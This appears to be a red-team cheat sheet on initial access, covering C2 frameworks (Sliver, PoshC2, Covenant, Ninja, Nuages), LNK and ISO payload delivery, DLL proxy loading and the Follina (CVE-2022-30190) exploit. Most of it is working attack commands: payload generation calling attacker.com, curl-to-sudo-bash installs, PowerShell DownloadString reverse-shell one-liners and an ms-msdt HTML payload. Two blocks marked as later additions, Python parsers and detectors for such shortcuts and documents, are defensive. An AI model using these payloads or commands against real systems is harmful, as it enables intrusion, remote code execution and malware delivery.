Initial Access
01. C2 Frameworks
01.1 Sliver
## ------------------| Setup
sudo apt install git mingw-w64
curl https://sliver.sh/install|sudo bash
systemctl status sliver
## ------------------| Create Payload (Session Mode)
### from mTLS
sliver > generate --mtls attacker.com:443 --save payload.exe
### from WireGuard
sliver > generate --wg attacker.com:443 --save payload.exe
### from HTTP
sliver > generate --http attacker.com:443 --save payload.exe
### from DNS
sliver > generate --dns attacker.com:443 --save payload.exe
## ------------------| Create Payload (Beacon Mode)
sliver > generate beacon --mtls attacker.com:443 --save beacon.exe
## ------------------| Generate for target OS
sliver > generate --mtls example.com --save /Users/moloch/Desktop --os mac
01.2 PoshC2
## ------------------| Install
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash
## ------------------| Create a new project
posh-project -n <project-name>
## ------------------| Projects can be switched to or listed using this script
[*] Usage: posh-project -n <new-project-name>
[*] Usage: posh-project -s <project-to-switch-to>
[*] Usage: posh-project -l (lists projects)
[*] Usage: posh-project -d <project-to-delete>
[*] Usage: posh-project -c (shows current project)
## ------------------| Edit the configuration for your project
posh-config
## ------------------| Launch the PoshC2 server
posh-server
## ------------------| Alternatively start it as a service
posh-service
01.3 Covenant
## ------------------| Install
git clone --recurse-submodules https://github.com/cobbr/Covenant && cd Covenant/Covenant
dotnet run
01.4 Ninja
## ------------------| Install
git clone https://github.com/ahmedkhlief/Ninja/ && cd Ninja
chmod +x ./install.sh
sudo ./install.sh
python3 start_campaign.py
python3 Ninja.py
## ------------------| Folder Structure
### agents/ : contains all the raw agents required by Ninja.
### core/ : contains all the core scripts to run Ninja.
### DA/ : the Defense Analysis script writes its output here.
### downloads/ : all files downloaded from the victim are stored here.
### file/ : files to be uploaded to the victim.
### images/ : screenshots are uploaded here.
### kerberoast/ : the kerberoast module writes its output here.
### lib/ : libraries used by Ninja C2.
### Modules/ : PowerShell modules that can be loaded on the victim.
### payloads/ : payloads ready to be used in the campaign.
### ninja.py : C2 main script.
### start_campaign.py : Python script to initialize the configuration for a campaign.
### links.txt : file containing words to be used in the callback links.
### install.sh : bash script to install the required
### c2-logs.txt : logs all commands with their results.
01.5 Nuages
## ------------------| Install
git clone https://github.com/p3nt4/Nuages
cd Nuages/Server/
bash setup.sh
bash start.sh
02. Delivery and Execution
02.1 Generate Payloads
Create LNK file
## ------------------| Setup
$obj = New-object -comobject wscript.shell
$link = $obj.createshortcut("c:\<filepath>\<filename>.lnk") # Changeme!
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Windows NT\Accessories\WordPad.exe"
$link.arguments = "/c start OneDriveStandaloneUpdater.exe"
$link.save()
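A defender-side counterpart, added here and not part of the original notes: a Python parser that reads the header, LinkInfo and StringData sections of a .lnk file and flags the combination the snippet above produces (minimised window, a script host as target, an icon borrowed from another program). build_lnk only constructs a stub fixture for the test, not a usable shortcut; the flag values and SW_SHOWMINNOACTIVE follow the MS-SHLLINK format.

```python
import struct

HAS_IDLIST, HAS_LINK_INFO, HAS_ARGUMENTS, HAS_ICON, IS_UNICODE = 0x01, 0x02, 0x20, 0x40, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, HAS_ARGUMENTS, HAS_ICON)  # Name, RelativePath, WorkingDir, Arguments, Icon
SW_SHOWMINNOACTIVE = 7  # the "windowstyle = 7" above: run minimised without taking focus
CLSID = bytes.fromhex("0114020000000000c000000000000046")  # Shell Link CLSID at header offset 4
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")

def _lnk_string(s):  # StringData item: uint16 char count followed by UTF-16LE chars
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")
def _link_info(local_path):  # minimal LinkInfo: 0x1C header, empty VolumeID, LocalBasePath, empty suffix
    path, vol = local_path.encode("ascii") + b"\x00", struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"
    base = 0x1C + len(vol)
    return struct.pack("<7I", base + len(path) + 1, 0x1C, 1, 0x1C, base, 0, base + len(path)) + vol + path + b"\x00"
def build_lnk(target, arguments, icon, show_command):
    """Constructed test fixture, not a real shortcut: header + LinkInfo + Arguments + IconLocation only."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I", 0x4C) + CLSID + struct.pack("<II", flags, 0) + bytes(24)  # three zero FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, ...
    return header + _link_info(target) + _lnk_string(arguments) + _lnk_string(icon)

def parse_lnk(data):
    """Pull target, ShowCommand, arguments and icon location out of a .lnk byte string."""
    flags, show = struct.unpack_from("<I", data, 0x14)[0], struct.unpack_from("<I", data, 0x3C)[0]
    pos, out = 0x4C, {"target": "", "show_command": show, "arguments": "", "icon": ""}
    if flags & HAS_IDLIST:  # skip LinkTargetIDList: uint16 size followed by that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        size, _, lflags, _, base = struct.unpack_from("<5I", data, pos)
        if lflags & 1:  # VolumeIDAndLocalBasePath: NUL-terminated ANSI path at LocalBasePathOffset
            out["target"] = data[pos + base:data.index(b"\x00", pos + base)].decode("latin-1")
        pos += size
    width = 2 if flags & IS_UNICODE else 1
    for flag in STRING_FLAGS:  # StringData items are stored in this fixed order, each only if its flag is set
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            text = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if width == 2 else "latin-1")
            out.update({HAS_ARGUMENTS: {"arguments": text}, HAS_ICON: {"icon": text}}.get(flag, {}))
            pos += 2 + count * width
    return out

def suspicious_reasons(fields):
    """Why a parsed .lnk matches the pattern above: minimised window, script-host target, borrowed icon."""
    base = lambda p: p.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    target, icon = base(fields["target"]), base(fields["icon"])
    checks = ((fields["show_command"] == SW_SHOWMINNOACTIVE, "window minimised (ShowCommand 7)"),
              (target in SHELLS, f"target is {target}"),
              (icon.endswith(".exe") and icon != target, f"icon taken from {icon}"))
    return [why for hit, why in checks if hit]
```

Run it over real shortcuts with parse_lnk(open(path, "rb").read()); a legitimate shortcut whose icon is its own target and whose window is normal returns an empty list.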
Packed as ISO
git clone https://github.com/mgeeky/PackMyPayload && cd PackMyPayload
pip3 install -r requirements.txt
python PackMyPayload.py c:\<filepath>\ c:\<filepath>\<filename>.iso --out-format iso --hide file1,file2
02.2 DLL Proxy Loading
## ------------------| Find a legitimate program to hijack the DLL
## Find a suitable binary from https://ninite.com
## For example, I will use OneDriveStandaloneUpdater.exe as below
copy %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe OneDriveUpdater.exe
## for a 64-bit target (on 64-bit Windows, System32 holds the 64-bit DLLs)
copy "C:\Windows\System32\version.dll" version-org.dll
## for a 32-bit target (on 64-bit Windows, SysWOW64 holds the 32-bit DLLs)
copy "C:\Windows\SysWOW64\version.dll" version-org.dll
## ------------------| Crafting the proxy payload
### Create simple payload bin
msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Proxy Loading worked" -f raw > shellcode.bin
### Download the repo below and compile it.
https://github.com/Flangvik/SharpDllProxy
### Copy version-org.dll and shellcode.bin into the SharpDllProxy directory
.\SharpDllProxy.exe --dll version-org.dll --payload shellcode.bin
### Open Visual Studio and create a new project -> Select C++ -> "Dynamic-link Library (DLL)" template
### The name of the solution should match the original DLL name
### Copy and paste the full content of output_<DLLNAME>/<DLLNAME>_pragma.c into the .cpp file
## https://h4rithd.com/blog/dll-proxy-loading/index.html
03. Other
03.1 MS-MSDT Follina [CVE-2022-30190]
Exploit
## ------------------| JohnHammond
git clone https://github.com/JohnHammond/msdt-follina
python3 follina.py -o exploit.doc -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
## ------------------| chvancooten
git clone https://github.com/chvancooten/follina.py
## Execute a local binary
python3 follina.py -t docx -m binary -b \windows\system32\calc.exe
## On Linux you may have to escape backslashes
python3 follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe
## RevShell
python3 follina.py -t rtf -m command -c "IEX(New-Object Net.WebClient).DownloadString('http://<HostIP>/rev.ps1')"
Scheme
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>
</body>
</html>
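A detection-side example, added here and not taken from the page or from either tool above: scan_docx unpacks a .docx and flags oleObject relationships that load a remote URL (the Follina delivery) or any part containing an ms-msdt: URI, and scan_html checks a fetched page for the ms-msdt: handler invocation, the IT_BrowseForFile injection and the long comment padding shown in the scheme above. build_sample_docx is a constructed stub package for the test, and example.invalid is a placeholder host.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)

def scan_docx(data):
    """Findings for a .docx byte string: remote oleObject relationships and ms-msdt: URIs in any part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if MSDT_RE.search(blob):
                findings.append(f"{name}: contains an ms-msdt: URI")
            if name.endswith(".rels"):  # OPC relationship parts, e.g. word/_rels/document.xml.rels
                for rel in ET.fromstring(blob).iter(REL_TAG):
                    target = rel.get("Target", "")
                    if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External" \
                            and target.lower().startswith(("http://", "https://")):
                        findings.append(f"{name}: oleObject loads remote {target}")
    return findings

def scan_html(text):
    """Findings for a fetched HTML page: the handler URI, the parameter injection and the comment padding."""
    findings = []
    if re.search(r"ms-msdt:/id\s+PCWDiagnostic", text, re.IGNORECASE):
        findings.append("ms-msdt: URI invoking PCWDiagnostic")
    if re.search(r"IT_BrowseForFile=.*?\$\(", text, re.IGNORECASE):
        findings.append("IT_BrowseForFile carries a $( ) PowerShell substitution")
    if re.search(r"(?://|<!--)\s*(.)\1{59,}", text):  # the >60-character filler comment
        findings.append("comment padded with a run of 60+ identical characters")
    return findings

def build_sample_docx(target):
    """Constructed stub package (not an openable document) whose document.xml.rels points at target."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{OLE_REL}" Target="{target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()
```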